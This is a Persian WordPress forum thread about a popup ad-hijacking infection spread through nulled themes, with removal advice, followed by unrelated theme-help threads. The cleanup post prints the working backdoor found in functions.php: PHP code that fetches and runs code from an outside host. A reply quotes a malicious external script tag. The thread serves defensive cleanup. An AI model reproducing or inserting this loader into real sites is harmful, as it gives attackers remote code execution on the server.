master89

ویروس پاپ آپ وردپرس go.pub2srv.com

2 پست در این موضوع قرار دارد

دوستان سلام

یک ویروس جدید اومده برای وردپرس که تبلیغات دزدید میکنه. به این صورت که پاپ آپ کلیکی باز میکنه و توی موبایل بدون کلیک پاپ آپ میذاره.

جالبش اینجاس که روی آی پی Admin وردپرس پاپ آپ نداره و حتی کد هم نمیتونید پیدا کنید!

شما میتونید از "پنجره ناشناس" فایرفاکس سایت خودتون رو باز کنید و کد و پاپ آپ رو ببینید. اما باز هم اگه با FTP برید داخل همون صفحه و بخواید کد رو پاک کنید. کد مخفی میشه. به این صورت که با هر بار بارگذاری صفحه کد از جایی بازخوانی میشه.

توی انجمن های فارسی که بحثی ازش نشده فکر کنم، توی انجمن های خارجی هم بحث شده اما جوابی دریافت نشده.

صفحه اصلی تبلیغ دزد: go.pub2srv.com هست. که هر بار لینک های تبلیغاتی متفاوتی همراه خودش میتونه داشته باشه. راه های زیادی برای از بین بردنش هست. اما باز بر میگرده و به مرور بیشتر میشه.

نکته آخر : این ویروس با قالب های نال شده و غیر قانونی وارد وبسایت شما میشه. معمولا هم ارائه دهنده این قالب ها سایت vestatheme هست که اکثر وبسایت هایی که قالب های تجاری رو رایگان برای دانلود میذارن، از این وبسایت دریافت میکنند (پس اکثر سایت ها خطرناک شدن)

آموزش حذف ویروس :

اول سایتتون رو اینجا وارد کنید و چک کنید

https://sitecheck.sucuri.net/  

حالا برید داخل فلدر قالبتون / فایل function.php رو پیدا کنید و ویرایش کنید

و قطعه کد زیر رو ازش حذف کنید



if ( ! function_exists( 'wp_temp_setup' ) ) {  
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];

if($tmpcontent = @file_get_contents("http://www.aotson.com/code.php?i=".$path))
{

function wp_temp_setup($phpCode) {
    $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setup");
    $handle = fopen($tmpfname, "w+");
    fwrite($handle, "<?php\n" . $phpCode);
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
}

extract(wp_temp_setup($tmpcontent));
}
}

?>

حالا افزونه  Exploit Scanner رو نصب کنید و اسکن کنید. پس از پایان اسکن ctrl+f رو بزنید و go.pub رو جستجو کنید. اگر نبود، یعنی همه چیز درسته.

(این افزونه کد های مخفی رو پیدا میکنه و نمایش میده)

سپاس

ویرایش شده در توسط مهدی
1

به اشتراک گذاری این پست


لینک به پست

سلام علیکم

 

سایت ما هم به این مسئله دچار شده و متأسفاه روشی که فرمودین جواب نداد (این سایت ماست)

اگه سورس قالب رو ملاحظه بفرمائید ظاهرا یک فایل جاوا اسکریپت هست که داره تبلیغات پاپ آپ میگیره و با آیدی ادمین سایت چیزی مشخص نیست فقط سایر کاربران می ببینند...

اینم فایل مخرب که البته با فاصله می نویسم تا گوگل صفحه رو بلاک نکنه:

<script src='h t t p s:// cdn. examhome. net/ cdn. j s ? v e r = 1 . 0 . 5 ' type='text/java s c r i p t'></script></p>
0

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط Mehdi256
      درود و خدا قوت
      دوستان یه سری سوالات داشتم ممنون میشم پاسخ بدید
      من خوب یه قالبی رو نصب کردم که راضیم از و میخام باهاش کار کنم  ولی خوب بعضی بخش هاشو نمیخام یه یه سری بخش هاش یه تغییر جزئی باید انجام بدم مث رنگ و راست و چپ بودنش .. قالبمم از فارسی پشتیبانی میکنه و چپ چی و راست چین هست فقط بخش هایی از اونن میخام تغییر بدم  مثلا توی نمایش تبلتی یا موبایلیش میخام title  سایت و اون tagline  شو چپ به راست کنم و این جور چیزا این یه سوالمه ...
      و اینکه چطور میشه که بخشی از  کاستومایز کردن تو قالب رو کاری کنیم که توی دسکتاپ یه جور نمایش بده و توی گوشی مثلا یه جور دیگه ؟ اینم سوال دوممه و خیلی مهمه برام ؟
    • توسط rshorche
      سلام دوستان وقتتون بخیر
      یه سایت برای نمایش کد تخفیف دارم 
      میخوام وقتی که یه پست رو ارسال میکنم یه باکس باشه که یه کد تخفیف رو نمایش بده 
      و یه دکمه باشه که هر سایتی که اون کد تخفیف رو ازش گرفتن لینک اون سایت رو بزارم و شخص با کلیک کردن روی دکمه منتقل بشه به اون سایت
      کد تخفیف و سایت رو میخوام به صورت دستی از داخل پنل وردپرس ثبت کنم 
      عکس ضمیمه هم نگاه کنید قسمتی که لازم دارم رو با رنگ مشکی نمایش دادم 
      خیلی ممنون میشم کسی بتونه کمک کنه

    • توسط ahmad25532
      سلام. من دو تا قالب دارم. جفتشون ویژوال کامپوزر رو دارند. آیا امکانش هست که ویژوال کامپوزر رو بخاطر اینکه نسخه ی جدیدتری داره از یه قالب بردارم ببرم قالب دیگه؟
      کلا این افزونه های پولی که داخل قالب ها هستند، فقط روی همون قالب جواب میدن یا نه، میشه برد رو یه قالب دیگه؟
      ممنون
    • توسط shayan.m
      سلام
      وقت بخیر
      دوستان عزیز مشاهده وب سایت میهن وردپرس کنید در قسمت فوتر وب سایت میهن وردپرس یک قسمت هست با نام اجتماعی باشیم می خواهم با توجه به تصویر زیر و اون سایت دقیق دقیق و مثل تصویر زیر انجام بدید من کد نویسی بلد نیستم یکی از دوستان لطفا بهم کدش بده و بگه کجا قرار بدم درست کند و بهم بده
      لطفا انجام بدید
      مرسی مرسی مرسی مرسی مرسی مرسی
      مشابه تصویر زیر:

    • توسط webdeveloper98
      سلام
      خسته نباشید
      من در حال طراحی قالب برای خودم هستم 
      یک مشکلی دارم !
      می خواستم نوشته های هر دسته بندی که می خوام رو در صفحه اصلی به صورت Grid نمایش بدم !
      هر جور انجام دادم نشد!
      به این شکل هستش
      زیر هم میاره 
      من تو حالت انتخابی براتون screen گرفتم تا متوجه بشین
       
      دوستان اگر راه حلی می دونین بهم بگید !
      کد من اینه :
      <?php get_header(); if ( have_posts() ) : while ( have_posts() ) : the_post(); ?> <div class="post-grid container"> <article> <h2><a href="<?php the_permalink() ?>"><?php the_title() ?></a></h2> <?php the_content() ?> </article> </div> <?php endwhile; else : echo ' هیچ نوشته ای وجود ندارد'; endif; get_footer(); ?> برای Css هم :
      transform: translate(-50%, -50%) scale(1.2); } .post-grid article .title { color: #6362fb; font-size: 18px; margin: .75rem 0 .25rem 0; } .post-grid article .date { color: #8c9199; font-size: 16px; margin: 0 0 .25rem 0; } .post-grid article p { color: #59596b; } .post-grid article a:hover .image div { -webkit-filter: grayscale(0.3); filter: grayscale(0.3); opacity: .3; } .post-grid article a:hover .image span { -webkit-transform: translate(-50%, -50%); transform: translate(-50%, -50%); opacity: 1; } css مشکلی نداره و دقیق هم هست اما مشکل داخل php هست 
      لطفا راهنماییم کنید